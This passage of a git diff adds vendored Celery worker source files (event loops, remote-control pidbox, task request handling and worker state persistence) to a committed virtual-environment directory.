**SOFTWARE_INFO) + + def start(self): + if self.eventer.enabled: + self._send('worker-online') + self.tref = self.timer.call_repeatedly( + self.interval, self._send, ('worker-heartbeat',), + ) + + def stop(self): + if self.tref is not None: + self.timer.cancel(self.tref) + self.tref = None + if self.eventer.enabled: + self._send('worker-offline', retry=False) diff --git a/env/Lib/site-packages/celery/worker/loops.py b/env/Lib/site-packages/celery/worker/loops.py new file mode 100644 index 00000000..0630e679 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/loops.py @@ -0,0 +1,135 @@ +"""The consumers highly-optimized inner loop.""" +import errno +import socket + +from celery import bootsteps +from celery.exceptions import WorkerLostError +from celery.utils.log import get_logger + +from . import state + +__all__ = ('asynloop', 'synloop') + +# pylint: disable=redefined-outer-name +# We cache globals and attribute lookups, so disable this warning. + +logger = get_logger(__name__) + + +def _quick_drain(connection, timeout=0.1): + try: + connection.drain_events(timeout=timeout) + except Exception as exc: # pylint: disable=broad-except + exc_errno = getattr(exc, 'errno', None) + if exc_errno is not None and exc_errno != errno.EAGAIN: + raise + + +def _enable_amqheartbeats(timer, connection, rate=2.0): + heartbeat_error = [None] + + if not connection: + return heartbeat_error + + heartbeat = connection.get_heartbeat_interval() # negotiated + if not (heartbeat and connection.supports_heartbeats): + return heartbeat_error + + def tick(rate): + try: + connection.heartbeat_check(rate) + except Exception as e: + # heartbeat_error is passed by reference can be updated + # no append here list should be fixed size=1 + heartbeat_error[0] = e + + timer.call_repeatedly(heartbeat / rate, tick, (rate,)) + return heartbeat_error + + +def asynloop(obj, connection, consumer, blueprint, hub, qos, + heartbeat, clock, hbrate=2.0): + """Non-blocking event loop.""" + RUN = bootsteps.RUN + update_qos = qos.update + errors = connection.connection_errors + + on_task_received = obj.create_task_handler() + + heartbeat_error = _enable_amqheartbeats(hub.timer, connection, rate=hbrate) + + consumer.on_message = on_task_received + obj.controller.register_with_event_loop(hub) + obj.register_with_event_loop(hub) + consumer.consume() + obj.on_ready() + + # did_start_ok will verify that pool processes were able to start, + # but this will only work the first time we start, as + # maxtasksperchild will mess up metrics. + if not obj.restart_count and not obj.pool.did_start_ok(): + raise WorkerLostError('Could not start worker processes') + + # consumer.consume() may have prefetched up to our + # limit - drain an event so we're in a clean state + # prior to starting our event loop. + if connection.transport.driver_type == 'amqp': + hub.call_soon(_quick_drain, connection) + + # FIXME: Use loop.run_forever + # Tried and works, but no time to test properly before release. + hub.propagate_errors = errors + loop = hub.create_loop() + + try: + while blueprint.state == RUN and obj.connection: + state.maybe_shutdown() + if heartbeat_error[0] is not None: + raise heartbeat_error[0] + + # We only update QoS when there's no more messages to read. + # This groups together qos calls, and makes sure that remote + # control commands will be prioritized over task messages. + if qos.prev != qos.value: + update_qos() + + try: + next(loop) + except StopIteration: + loop = hub.create_loop() + finally: + try: + hub.reset() + except Exception as exc: # pylint: disable=broad-except + logger.exception( + 'Error cleaning up after event loop: %r', exc) + + +def synloop(obj, connection, consumer, blueprint, hub, qos, + heartbeat, clock, hbrate=2.0, **kwargs): + """Fallback blocking event loop for transports that doesn't support AIO.""" + RUN = bootsteps.RUN + on_task_received = obj.create_task_handler() + perform_pending_operations = obj.perform_pending_operations + heartbeat_error = [None] + if getattr(obj.pool, 'is_green', False): + heartbeat_error = _enable_amqheartbeats(obj.timer, connection, rate=hbrate) + consumer.on_message = on_task_received + consumer.consume() + + obj.on_ready() + + while blueprint.state == RUN and obj.connection: + state.maybe_shutdown() + if heartbeat_error[0] is not None: + raise heartbeat_error[0] + if qos.prev != qos.value: + qos.update() + try: + perform_pending_operations() + connection.drain_events(timeout=2.0) + except socket.timeout: + pass + except OSError: + if blueprint.state == RUN: + raise diff --git a/env/Lib/site-packages/celery/worker/pidbox.py b/env/Lib/site-packages/celery/worker/pidbox.py new file mode 100644 index 00000000..a18b4338 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/pidbox.py @@ -0,0 +1,122 @@ +"""Worker Pidbox (remote control).""" +import socket +import threading + +from kombu.common import ignore_errors +from kombu.utils.encoding import safe_str + +from celery.utils.collections import AttributeDict +from celery.utils.functional import pass1 +from celery.utils.log import get_logger + +from . import control + +__all__ = ('Pidbox', 'gPidbox') + +logger = get_logger(__name__) +debug, error, info = logger.debug, logger.error, logger.info + + +class Pidbox: + """Worker mailbox.""" + + consumer = None + + def __init__(self, c): + self.c = c + self.hostname = c.hostname + self.node = c.app.control.mailbox.Node( + safe_str(c.hostname), + handlers=control.Panel.data, + state=AttributeDict( + app=c.app, + hostname=c.hostname, + consumer=c, + tset=pass1 if c.controller.use_eventloop else set), + ) + self._forward_clock = self.c.app.clock.forward + + def on_message(self, body, message): + # just increase clock as clients usually don't + # have a valid clock to adjust with. + self._forward_clock() + try: + self.node.handle_message(body, message) + except KeyError as exc: + error('No such control command: %s', exc) + except Exception as exc: + error('Control command error: %r', exc, exc_info=True) + self.reset() + + def start(self, c): + self.node.channel = c.connection.channel() + self.consumer = self.node.listen(callback=self.on_message) + self.consumer.on_decode_error = c.on_decode_error + + def on_stop(self): + pass + + def stop(self, c): + self.on_stop() + self.consumer = self._close_channel(c) + + def reset(self): + self.stop(self.c) + self.start(self.c) + + def _close_channel(self, c): + if self.node and self.node.channel: + ignore_errors(c, self.node.channel.close) + + def shutdown(self, c): + self.on_stop() + if self.consumer: + debug('Canceling broadcast consumer...') + ignore_errors(c, self.consumer.cancel) + self.stop(self.c) + + +class gPidbox(Pidbox): + """Worker pidbox (greenlet).""" + + _node_shutdown = None + _node_stopped = None + _resets = 0 + + def start(self, c): + c.pool.spawn_n(self.loop, c) + + def on_stop(self): + if self._node_stopped: + self._node_shutdown.set() + debug('Waiting for broadcast thread to shutdown...') + self._node_stopped.wait() + self._node_stopped = self._node_shutdown = None + + def reset(self): + self._resets += 1 + + def _do_reset(self, c, connection): + self._close_channel(c) + self.node.channel = connection.channel() + self.consumer = self.node.listen(callback=self.on_message) + self.consumer.consume() + + def loop(self, c): + resets = [self._resets] + shutdown = self._node_shutdown = threading.Event() + stopped = self._node_stopped = threading.Event() + try: + with c.connection_for_read() as connection: + info('pidbox: Connected to %s.', connection.as_uri()) + self._do_reset(c, connection) + while not shutdown.is_set() and c.connection: + if resets[0] < self._resets: + resets[0] += 1 + self._do_reset(c, connection) + try: + connection.drain_events(timeout=1.0) + except socket.timeout: + pass + finally: + stopped.set() diff --git a/env/Lib/site-packages/celery/worker/request.py b/env/Lib/site-packages/celery/worker/request.py new file mode 100644 index 00000000..5d7c93a4 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/request.py @@ -0,0 +1,790 @@ +"""Task request. + +This module defines the :class:`Request` class, that specifies +how tasks are executed. +""" +import logging +import sys +from datetime import datetime +from time import monotonic, time +from weakref import ref + +from billiard.common import TERM_SIGNAME +from billiard.einfo import ExceptionWithTraceback +from kombu.utils.encoding import safe_repr, safe_str +from kombu.utils.objects import cached_property + +from celery import current_app, signals +from celery.app.task import Context +from celery.app.trace import fast_trace_task, trace_task, trace_task_ret +from celery.concurrency.base import BasePool +from celery.exceptions import (Ignore, InvalidTaskError, Reject, Retry, TaskRevokedError, Terminated, + TimeLimitExceeded, WorkerLostError) +from celery.platforms import signals as _signals +from celery.utils.functional import maybe, maybe_list, noop +from celery.utils.log import get_logger +from celery.utils.nodenames import gethostname +from celery.utils.serialization import get_pickled_exception +from celery.utils.time import maybe_iso8601, maybe_make_aware, timezone + +from . import state + +__all__ = ('Request',) + +# pylint: disable=redefined-outer-name +# We cache globals and attribute lookups, so disable this warning. + +IS_PYPY = hasattr(sys, 'pypy_version_info') + +logger = get_logger(__name__) +debug, info, warn, error = (logger.debug, logger.info, + logger.warning, logger.error) +_does_info = False +_does_debug = False + + +def __optimize__(): + # this is also called by celery.app.trace.setup_worker_optimizations + global _does_debug + global _does_info + _does_debug = logger.isEnabledFor(logging.DEBUG) + _does_info = logger.isEnabledFor(logging.INFO) + + +__optimize__() + +# Localize +tz_or_local = timezone.tz_or_local +send_revoked = signals.task_revoked.send +send_retry = signals.task_retry.send + +task_accepted = state.task_accepted +task_ready = state.task_ready +revoked_tasks = state.revoked +revoked_stamps = state.revoked_stamps + + +class Request: + """A request for task execution.""" + + acknowledged = False + time_start = None + worker_pid = None + time_limits = (None, None) + _already_revoked = False + _already_cancelled = False + _terminate_on_ack = None + _apply_result = None + _tzlocal = None + + if not IS_PYPY: # pragma: no cover + __slots__ = ( + '_app', '_type', 'name', 'id', '_root_id', '_parent_id', + '_on_ack', '_body', '_hostname', '_eventer', '_connection_errors', + '_task', '_eta', '_expires', '_request_dict', '_on_reject', '_utc', + '_content_type', '_content_encoding', '_argsrepr', '_kwargsrepr', + '_args', '_kwargs', '_decoded', '__payload', + '__weakref__', '__dict__', + ) + + def __init__(self, message, on_ack=noop, + hostname=None, eventer=None, app=None, + connection_errors=None, request_dict=None, + task=None, on_reject=noop, body=None, + headers=None, decoded=False, utc=True, + maybe_make_aware=maybe_make_aware, + maybe_iso8601=maybe_iso8601, **opts): + self._message = message + self._request_dict = (message.headers.copy() if headers is None + else headers.copy()) + self._body = message.body if body is None else body + self._app = app + self._utc = utc + self._decoded = decoded + if decoded: + self._content_type = self._content_encoding = None + else: + self._content_type, self._content_encoding = ( + message.content_type, message.content_encoding, + ) + self.__payload = self._body if self._decoded else message.payload + self.id = self._request_dict['id'] + self._type = self.name = self._request_dict['task'] + if 'shadow' in self._request_dict: + self.name = self._request_dict['shadow'] or self.name + self._root_id = self._request_dict.get('root_id') + self._parent_id = self._request_dict.get('parent_id') + timelimit = self._request_dict.get('timelimit', None) + if timelimit: + self.time_limits = timelimit + self._argsrepr = self._request_dict.get('argsrepr', '') + self._kwargsrepr = self._request_dict.get('kwargsrepr', '') + self._on_ack = on_ack + self._on_reject = on_reject + self._hostname = hostname or gethostname() + self._eventer = eventer + self._connection_errors = connection_errors or () + self._task = task or self._app.tasks[self._type] + self._ignore_result = self._request_dict.get('ignore_result', False) + + # timezone means the message is timezone-aware, and the only timezone + # supported at this point is UTC. + eta = self._request_dict.get('eta') + if eta is not None: + try: + eta = maybe_iso8601(eta) + except (AttributeError, ValueError, TypeError) as exc: + raise InvalidTaskError( + f'invalid ETA value {eta!r}: {exc}') + self._eta = maybe_make_aware(eta, self.tzlocal) + else: + self._eta = None + + expires = self._request_dict.get('expires') + if expires is not None: + try: + expires = maybe_iso8601(expires) + except (AttributeError, ValueError, TypeError) as exc: + raise InvalidTaskError( + f'invalid expires value {expires!r}: {exc}') + self._expires = maybe_make_aware(expires, self.tzlocal) + else: + self._expires = None + + delivery_info = message.delivery_info or {} + properties = message.properties or {} + self._delivery_info = { + 'exchange': delivery_info.get('exchange'), + 'routing_key': delivery_info.get('routing_key'), + 'priority': properties.get('priority'), + 'redelivered': delivery_info.get('redelivered', False), + } + self._request_dict.update({ + 'properties': properties, + 'reply_to': properties.get('reply_to'), + 'correlation_id': properties.get('correlation_id'), + 'hostname': self._hostname, + 'delivery_info': self._delivery_info + }) + # this is a reference pass to avoid memory usage burst + self._request_dict['args'], self._request_dict['kwargs'], _ = self.__payload + self._args = self._request_dict['args'] + self._kwargs = self._request_dict['kwargs'] + + @property + def delivery_info(self): + return self._delivery_info + + @property + def message(self): + return self._message + + @property + def request_dict(self): + return self._request_dict + + @property + def body(self): + return self._body + + @property + def app(self): + return self._app + + @property + def utc(self): + return self._utc + + @property + def content_type(self): + return self._content_type + + @property + def content_encoding(self): + return self._content_encoding + + @property + def type(self): + return self._type + + @property + def root_id(self): + return self._root_id + + @property + def parent_id(self): + return self._parent_id + + @property + def argsrepr(self): + return self._argsrepr + + @property + def args(self): + return self._args + + @property + def kwargs(self): + return self._kwargs + + @property + def kwargsrepr(self): + return self._kwargsrepr + + @property + def on_ack(self): + return self._on_ack + + @property + def on_reject(self): + return self._on_reject + + @on_reject.setter + def on_reject(self, value): + self._on_reject = value + + @property + def hostname(self): + return self._hostname + + @property + def ignore_result(self): + return self._ignore_result + + @property + def eventer(self): + return self._eventer + + @eventer.setter + def eventer(self, eventer): + self._eventer = eventer + + @property + def connection_errors(self): + return self._connection_errors + + @property + def task(self): + return self._task + + @property + def eta(self): + return self._eta + + @property + def expires(self): + return self._expires + + @expires.setter + def expires(self, value): + self._expires = value + + @property + def tzlocal(self): + if self._tzlocal is None: + self._tzlocal = self._app.conf.timezone + return self._tzlocal + + @property + def store_errors(self): + return (not self.task.ignore_result or + self.task.store_errors_even_if_ignored) + + @property + def task_id(self): + # XXX compat + return self.id + + @task_id.setter + def task_id(self, value): + self.id = value + + @property + def task_name(self): + # XXX compat + return self.name + + @task_name.setter + def task_name(self, value): + self.name = value + + @property + def reply_to(self): + # used by rpc backend when failures reported by parent process + return self._request_dict['reply_to'] + + @property + def replaced_task_nesting(self): + return self._request_dict.get('replaced_task_nesting', 0) + + @property + def groups(self): + return self._request_dict.get('groups', []) + + @property + def stamped_headers(self) -> list: + return self._request_dict.get('stamped_headers') or [] + + @property + def stamps(self) -> dict: + stamps = self._request_dict.get('stamps') or {} + return {header: stamps.get(header) for header in self.stamped_headers} + + @property + def correlation_id(self): + # used similarly to reply_to + return self._request_dict['correlation_id'] + + def execute_using_pool(self, pool: BasePool, **kwargs): + """Used by the worker to send this task to the pool. + + Arguments: + pool (~celery.concurrency.base.TaskPool): The execution pool + used to execute this request. + + Raises: + celery.exceptions.TaskRevokedError: if the task was revoked. + """ + task_id = self.id + task = self._task + if self.revoked(): + raise TaskRevokedError(task_id) + + time_limit, soft_time_limit = self.time_limits + trace = fast_trace_task if self._app.use_fast_trace_task else trace_task_ret + result = pool.apply_async( + trace, + args=(self._type, task_id, self._request_dict, self._body, + self._content_type, self._content_encoding), + accept_callback=self.on_accepted, + timeout_callback=self.on_timeout, + callback=self.on_success, + error_callback=self.on_failure, + soft_timeout=soft_time_limit or task.soft_time_limit, + timeout=time_limit or task.time_limit, + correlation_id=task_id, + ) + # cannot create weakref to None + self._apply_result = maybe(ref, result) + return result + + def execute(self, loglevel=None, logfile=None): + """Execute the task in a :func:`~celery.app.trace.trace_task`. + + Arguments: + loglevel (int): The loglevel used by the task. + logfile (str): The logfile used by the task. + """ + if self.revoked(): + return + + # acknowledge task as being processed. + if not self.task.acks_late: + self.acknowledge() + + _, _, embed = self._payload + request = self._request_dict + # pylint: disable=unpacking-non-sequence + # payload is a property, so pylint doesn't think it's a tuple. + request.update({ + 'loglevel': loglevel, + 'logfile': logfile, + 'is_eager': False, + }, **embed or {}) + + retval, I, _, _ = trace_task(self.task, self.id, self._args, self._kwargs, request, + hostname=self._hostname, loader=self._app.loader, + app=self._app) + + if I: + self.reject(requeue=False) + else: + self.acknowledge() + return retval + + def maybe_expire(self): + """If expired, mark the task as revoked.""" + if self.expires: + now = datetime.now(self.expires.tzinfo) + if now > self.expires: + revoked_tasks.add(self.id) + return True + + def terminate(self, pool, signal=None): + signal = _signals.signum(signal or TERM_SIGNAME) + if self.time_start: + pool.terminate_job(self.worker_pid, signal) + self._announce_revoked('terminated', True, signal, False) + else: + self._terminate_on_ack = pool, signal + if self._apply_result is not None: + obj = self._apply_result() # is a weakref + if obj is not None: + obj.terminate(signal) + + def cancel(self, pool, signal=None): + signal = _signals.signum(signal or TERM_SIGNAME) + if self.time_start: + pool.terminate_job(self.worker_pid, signal) + self._announce_cancelled() + + if self._apply_result is not None: + obj = self._apply_result() # is a weakref + if obj is not None: + obj.terminate(signal) + + def _announce_cancelled(self): + task_ready(self) + self.send_event('task-cancelled') + reason = 'cancelled by Celery' + exc = Retry(message=reason) + self.task.backend.mark_as_retry(self.id, + exc, + request=self._context) + + self.task.on_retry(exc, self.id, self.args, self.kwargs, None) + self._already_cancelled = True + send_retry(self.task, request=self._context, einfo=None) + + def _announce_revoked(self, reason, terminated, signum, expired): + task_ready(self) + self.send_event('task-revoked', + terminated=terminated, signum=signum, expired=expired) + self.task.backend.mark_as_revoked( + self.id, reason, request=self._context, + store_result=self.store_errors, + ) + self.acknowledge() + self._already_revoked = True + send_revoked(self.task, request=self._context, + terminated=terminated, signum=signum, expired=expired) + + def revoked(self): + """If revoked, skip task and mark state.""" + expired = False + if self._already_revoked: + return True + if self.expires: + expired = self.maybe_expire() + revoked_by_id = self.id in revoked_tasks + revoked_by_header, revoking_header = False, None + + if not revoked_by_id and self.stamped_headers: + for stamp in self.stamped_headers: + if stamp in revoked_stamps: + revoked_header = revoked_stamps[stamp] + stamped_header = self._message.headers['stamps'][stamp] + + if isinstance(stamped_header, (list, tuple)): + for stamped_value in stamped_header: + if stamped_value in maybe_list(revoked_header): + revoked_by_header = True + revoking_header = {stamp: stamped_value} + break + else: + revoked_by_header = any([ + stamped_header in maybe_list(revoked_header), + stamped_header == revoked_header, # When the header is a single set value + ]) + revoking_header = {stamp: stamped_header} + break + + if any((expired, revoked_by_id, revoked_by_header)): + log_msg = 'Discarding revoked task: %s[%s]' + if revoked_by_header: + log_msg += ' (revoked by header: %s)' % revoking_header + info(log_msg, self.name, self.id) + self._announce_revoked( + 'expired' if expired else 'revoked', False, None, expired, + ) + return True + return False + + def send_event(self, type, **fields): + if self._eventer and self._eventer.enabled and self.task.send_events: + self._eventer.send(type, uuid=self.id, **fields) + + def on_accepted(self, pid, time_accepted): + """Handler called when task is accepted by worker pool.""" + self.worker_pid = pid + # Convert monotonic time_accepted to absolute time + self.time_start = time() - (monotonic() - time_accepted) + task_accepted(self) + if not self.task.acks_late: + self.acknowledge() + self.send_event('task-started') + if _does_debug: + debug('Task accepted: %s[%s] pid:%r', self.name, self.id, pid) + if self._terminate_on_ack is not None: + self.terminate(*self._terminate_on_ack) + + def on_timeout(self, soft, timeout): + """Handler called if the task times out.""" + if soft: + warn('Soft time limit (%ss) exceeded for %s[%s]', + timeout, self.name, self.id) + else: + task_ready(self) + error('Hard time limit (%ss) exceeded for %s[%s]', + timeout, self.name, self.id) + exc = TimeLimitExceeded(timeout) + + self.task.backend.mark_as_failure( + self.id, exc, request=self._context, + store_result=self.store_errors, + ) + + if self.task.acks_late and self.task.acks_on_failure_or_timeout: + self.acknowledge() + + def on_success(self, failed__retval__runtime, **kwargs): + """Handler called if the task was successfully processed.""" + failed, retval, runtime = failed__retval__runtime + if failed: + exc = retval.exception + if isinstance(exc, ExceptionWithTraceback): + exc = exc.exc + if isinstance(exc, (SystemExit, KeyboardInterrupt)): + raise exc + return self.on_failure(retval, return_ok=True) + task_ready(self, successful=True) + + if self.task.acks_late: + self.acknowledge() + + self.send_event('task-succeeded', result=retval, runtime=runtime) + + def on_retry(self, exc_info): + """Handler called if the task should be retried.""" + if self.task.acks_late: + self.acknowledge() + + self.send_event('task-retried', + exception=safe_repr(exc_info.exception.exc), + traceback=safe_str(exc_info.traceback)) + + def on_failure(self, exc_info, send_failed_event=True, return_ok=False): + """Handler called if the task raised an exception.""" + task_ready(self) + exc = exc_info.exception + + if isinstance(exc, ExceptionWithTraceback): + exc = exc.exc + + is_terminated = isinstance(exc, Terminated) + if is_terminated: + # If the task was terminated and the task was not cancelled due + # to a connection loss, it is revoked. + + # We always cancel the tasks inside the master process. + # If the request was cancelled, it was not revoked and there's + # nothing to be done. + # According to the comment below, we need to check if the task + # is already revoked and if it wasn't, we should announce that + # it was. + if not self._already_cancelled and not self._already_revoked: + # This is a special case where the process + # would not have had time to write the result. + self._announce_revoked( + 'terminated', True, str(exc), False) + return + elif isinstance(exc, MemoryError): + raise MemoryError(f'Process got: {exc}') + elif isinstance(exc, Reject): + return self.reject(requeue=exc.requeue) + elif isinstance(exc, Ignore): + return self.acknowledge() + elif isinstance(exc, Retry): + return self.on_retry(exc_info) + + # (acks_late) acknowledge after result stored. + requeue = False + is_worker_lost = isinstance(exc, WorkerLostError) + if self.task.acks_late: + reject = ( + self.task.reject_on_worker_lost and + is_worker_lost + ) + ack = self.task.acks_on_failure_or_timeout + if reject: + requeue = True + self.reject(requeue=requeue) + send_failed_event = False + elif ack: + self.acknowledge() + else: + # supporting the behaviour where a task failed and + # need to be removed from prefetched local queue + self.reject(requeue=False) + + # This is a special case where the process would not have had time + # to write the result. + if not requeue and (is_worker_lost or not return_ok): + # only mark as failure if task has not been requeued + self.task.backend.mark_as_failure( + self.id, exc, request=self._context, + store_result=self.store_errors, + ) + + signals.task_failure.send(sender=self.task, task_id=self.id, + exception=exc, args=self.args, + kwargs=self.kwargs, + traceback=exc_info.traceback, + einfo=exc_info) + + if send_failed_event: + self.send_event( + 'task-failed', + exception=safe_repr(get_pickled_exception(exc_info.exception)), + traceback=exc_info.traceback, + ) + + if not return_ok: + error('Task handler raised error: %r', exc, + exc_info=exc_info.exc_info) + + def acknowledge(self): + """Acknowledge task.""" + if not self.acknowledged: + self._on_ack(logger, self._connection_errors) + self.acknowledged = True + + def reject(self, requeue=False): + if not self.acknowledged: + self._on_reject(logger, self._connection_errors, requeue) + self.acknowledged = True + self.send_event('task-rejected', requeue=requeue) + + def info(self, safe=False): + return { + 'id': self.id, + 'name': self.name, + 'args': self._args if not safe else self._argsrepr, + 'kwargs': self._kwargs if not safe else self._kwargsrepr, + 'type': self._type, + 'hostname': self._hostname, + 'time_start': self.time_start, + 'acknowledged': self.acknowledged, + 'delivery_info': self.delivery_info, + 'worker_pid': self.worker_pid, + } + + def humaninfo(self): + return '{0.name}[{0.id}]'.format(self) + + def __str__(self): + """``str(self)``.""" + return ' '.join([ + self.humaninfo(), + f' ETA:[{self._eta}]' if self._eta else '', + f' expires:[{self._expires}]' if self._expires else '', + ]).strip() + + def __repr__(self): + """``repr(self)``.""" + return '<{}: {} {} {}>'.format( + type(self).__name__, self.humaninfo(), + self._argsrepr, self._kwargsrepr, + ) + + @cached_property + def _payload(self): + return self.__payload + + @cached_property + def chord(self): + # used by backend.mark_as_failure when failure is reported + # by parent process + # pylint: disable=unpacking-non-sequence + # payload is a property, so pylint doesn't think it's a tuple. + _, _, embed = self._payload + return embed.get('chord') + + @cached_property + def errbacks(self): + # used by backend.mark_as_failure when failure is reported + # by parent process + # pylint: disable=unpacking-non-sequence + # payload is a property, so pylint doesn't think it's a tuple. + _, _, embed = self._payload + return embed.get('errbacks') + + @cached_property + def group(self): + # used by backend.on_chord_part_return when failures reported + # by parent process + return self._request_dict.get('group') + + @cached_property + def _context(self): + """Context (:class:`~celery.app.task.Context`) of this task.""" + request = self._request_dict + # pylint: disable=unpacking-non-sequence + # payload is a property, so pylint doesn't think it's a tuple. + _, _, embed = self._payload + request.update(**embed or {}) + return Context(request) + + @cached_property + def group_index(self): + # used by backend.on_chord_part_return to order return values in group + return self._request_dict.get('group_index') + + +def create_request_cls(base, task, pool, hostname, eventer, + ref=ref, revoked_tasks=revoked_tasks, + task_ready=task_ready, trace=None, app=current_app): + default_time_limit = task.time_limit + default_soft_time_limit = task.soft_time_limit + apply_async = pool.apply_async + acks_late = task.acks_late + events = eventer and eventer.enabled + + if trace is None: + trace = fast_trace_task if app.use_fast_trace_task else trace_task_ret + + class Request(base): + + def execute_using_pool(self, pool, **kwargs): + task_id = self.task_id + if self.revoked(): + raise TaskRevokedError(task_id) + + time_limit, soft_time_limit = self.time_limits + result = apply_async( + trace, + args=(self.type, task_id, self.request_dict, self.body, + self.content_type, self.content_encoding), + accept_callback=self.on_accepted, + timeout_callback=self.on_timeout, + callback=self.on_success, + error_callback=self.on_failure, + soft_timeout=soft_time_limit or default_soft_time_limit, + timeout=time_limit or default_time_limit, + correlation_id=task_id, + ) + # cannot create weakref to None + # pylint: disable=attribute-defined-outside-init + self._apply_result = maybe(ref, result) + return result + + def on_success(self, failed__retval__runtime, **kwargs): + failed, retval, runtime = failed__retval__runtime + if failed: + exc = retval.exception + if isinstance(exc, ExceptionWithTraceback): + exc = exc.exc + if isinstance(exc, (SystemExit, KeyboardInterrupt)): + raise exc + return self.on_failure(retval, return_ok=True) + task_ready(self) + + if acks_late: + self.acknowledge() + + if events: + self.send_event( + 'task-succeeded', result=retval, runtime=runtime, + ) + + return Request diff --git a/env/Lib/site-packages/celery/worker/state.py b/env/Lib/site-packages/celery/worker/state.py new file mode 100644 index 00000000..8c70bbd9 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/state.py @@ -0,0 +1,288 @@ +"""Internal worker state (global). + +This includes the currently active and reserved tasks, +statistics, and revoked tasks. +""" +import os +import platform +import shelve +import sys +import weakref +import zlib +from collections import Counter + +from kombu.serialization import pickle, pickle_protocol +from kombu.utils.objects import cached_property + +from celery import __version__ +from celery.exceptions import WorkerShutdown, WorkerTerminate +from celery.utils.collections import LimitedSet + +__all__ = ( + 'SOFTWARE_INFO', 'reserved_requests', 'active_requests', + 'total_count', 'revoked', 'task_reserved', 'maybe_shutdown', + 'task_accepted', 'task_ready', 'Persistent', +) + +#: Worker software/platform information. +SOFTWARE_INFO = { + 'sw_ident': 'py-celery', + 'sw_ver': __version__, + 'sw_sys': platform.system(), +} + +#: maximum number of revokes to keep in memory. +REVOKES_MAX = int(os.environ.get('CELERY_WORKER_REVOKES_MAX', 50000)) + +#: maximum number of successful tasks to keep in memory. +SUCCESSFUL_MAX = int(os.environ.get('CELERY_WORKER_SUCCESSFUL_MAX', 1000)) + +#: how many seconds a revoke will be active before +#: being expired when the max limit has been exceeded. +REVOKE_EXPIRES = float(os.environ.get('CELERY_WORKER_REVOKE_EXPIRES', 10800)) + +#: how many seconds a successful task will be cached in memory +#: before being expired when the max limit has been exceeded. +SUCCESSFUL_EXPIRES = float(os.environ.get('CELERY_WORKER_SUCCESSFUL_EXPIRES', 10800)) + +#: Mapping of reserved task_id->Request. +requests = {} + +#: set of all reserved :class:`~celery.worker.request.Request`'s. +reserved_requests = weakref.WeakSet() + +#: set of currently active :class:`~celery.worker.request.Request`'s. +active_requests = weakref.WeakSet() + +#: A limited set of successful :class:`~celery.worker.request.Request`'s. +successful_requests = LimitedSet(maxlen=SUCCESSFUL_MAX, + expires=SUCCESSFUL_EXPIRES) + +#: count of tasks accepted by the worker, sorted by type. +total_count = Counter() + +#: count of all tasks accepted by the worker +all_total_count = [0] + +#: the list of currently revoked tasks. Persistent if ``statedb`` set. +revoked = LimitedSet(maxlen=REVOKES_MAX, expires=REVOKE_EXPIRES) + +#: Mapping of stamped headers flagged for revoking. +revoked_stamps = {} + +should_stop = None +should_terminate = None + + +def reset_state(): + requests.clear() + reserved_requests.clear() + active_requests.clear() + successful_requests.clear() + total_count.clear() + all_total_count[:] = [0] + revoked.clear() + revoked_stamps.clear() + + +def maybe_shutdown(): + """Shutdown if flags have been set.""" + if should_terminate is not None and should_terminate is not False: + raise WorkerTerminate(should_terminate) + elif should_stop is not None and should_stop is not False: + raise WorkerShutdown(should_stop) + + +def task_reserved(request, + add_request=requests.__setitem__, + add_reserved_request=reserved_requests.add): + """Update global state when a task has been reserved.""" + add_request(request.id, request) + add_reserved_request(request) + + +def task_accepted(request, + _all_total_count=None, + add_request=requests.__setitem__, + add_active_request=active_requests.add, + add_to_total_count=total_count.update): + """Update global state when a task has been accepted.""" + if not _all_total_count: + _all_total_count = all_total_count + add_request(request.id, request) + add_active_request(request) + add_to_total_count({request.name: 1}) + all_total_count[0] += 1 + + +def task_ready(request, + successful=False, + remove_request=requests.pop, + discard_active_request=active_requests.discard, + discard_reserved_request=reserved_requests.discard): + """Update global state when a task is ready.""" + if successful: + successful_requests.add(request.id) + + remove_request(request.id, None) + discard_active_request(request) + discard_reserved_request(request) + + +C_BENCH = os.environ.get('C_BENCH') or os.environ.get('CELERY_BENCH') +C_BENCH_EVERY = int(os.environ.get('C_BENCH_EVERY') or + os.environ.get('CELERY_BENCH_EVERY') or 1000) +if C_BENCH: # pragma: no cover + import atexit + from time import monotonic + + from billiard.process import current_process + + from celery.utils.debug import memdump, sample_mem + + all_count = 0 + bench_first = None + bench_start = None + bench_last = None + bench_every = C_BENCH_EVERY + bench_sample = [] + __reserved = task_reserved + __ready = task_ready + + if current_process()._name == 'MainProcess': + @atexit.register + def on_shutdown(): + if bench_first is not None and bench_last is not None: + print('- Time spent in benchmark: {!r}'.format( + bench_last - bench_first)) + print('- Avg: {}'.format( + sum(bench_sample) / len(bench_sample))) + memdump() + + def task_reserved(request): + """Called when a task is reserved by the worker.""" + global bench_start + global bench_first + now = None + if bench_start is None: + bench_start = now = monotonic() + if bench_first is None: + bench_first = now + + return __reserved(request) + + def task_ready(request): + """Called when a task is completed.""" + global all_count + global bench_start + global bench_last + all_count += 1 + if not all_count % bench_every: + now = monotonic() + diff = now - bench_start + print('- Time spent processing {} tasks (since first ' + 'task received): ~{:.4f}s\n'.format(bench_every, diff)) + sys.stdout.flush() + bench_start = bench_last = now + bench_sample.append(diff) + sample_mem() + return __ready(request) + + +class Persistent: + """Stores worker state between restarts. + + This is the persistent data stored by the worker when + :option:`celery worker --statedb` is enabled. + + Currently only stores revoked task id's. + """ + + storage = shelve + protocol = pickle_protocol + compress = zlib.compress + decompress = zlib.decompress + _is_open = False + + def __init__(self, state, filename, clock=None): + self.state = state + self.filename = filename + self.clock = clock + self.merge() + + def open(self): + return self.storage.open( + self.filename, protocol=self.protocol, writeback=True, + ) + + def merge(self): + self._merge_with(self.db) + + def sync(self): + self._sync_with(self.db) + self.db.sync() + + def close(self): + if self._is_open: + self.db.close() + self._is_open = False + + def save(self): + self.sync() + self.close() + + def _merge_with(self, d): + self._merge_revoked(d) + self._merge_clock(d) + return d + + def _sync_with(self, d): + self._revoked_tasks.purge() + d.update({ + '__proto__': 3, + 'zrevoked': self.compress(self._dumps(self._revoked_tasks)), + 'clock': self.clock.forward() if self.clock else 0, + }) + return d + + def _merge_clock(self, d): + if self.clock: + d['clock'] = self.clock.adjust(d.get('clock') or 0) + + def _merge_revoked(self, d): + try: + self._merge_revoked_v3(d['zrevoked']) + except KeyError: + try: + self._merge_revoked_v2(d.pop('revoked')) + except KeyError: + pass + # purge expired items at boot + 